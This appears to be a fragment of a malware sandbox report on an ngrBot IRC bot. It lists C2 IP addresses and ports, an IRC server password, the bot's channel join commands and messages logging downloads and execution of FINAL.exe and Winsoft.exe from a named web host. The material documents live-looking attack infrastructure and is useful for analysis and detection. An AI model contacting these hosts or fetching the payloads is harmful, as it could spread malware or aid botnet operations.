Remote Host Port Number
109.169.37.16 7777 PASS laekin0505x
199.15.234.7 80
65.254.250.108 80
NICK n{US|XPa}gvplpfy
USER gvplpfy 0 0 :gvplpfy
JOIN #totalrenovation2011 ngrBot
PRIVMSG #totalrenovation2011 :[d=”http://teraniprom.com/admin/product_picture/FINAL.exe” s=”114688 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0
PRIVMSG #totalrenovation2011 :[d=”http://teraniprom.com/admin/product_picture/Winsoft.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataMcxaxm.exe” – Download retries: 0
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://teraniprom.com/admin/product_picture/FINAL.exe
o http://teraniprom.com/admin/product_picture/Winsoft.exe
hosting infos:
http://whois.domaintools.com/109.169.37.16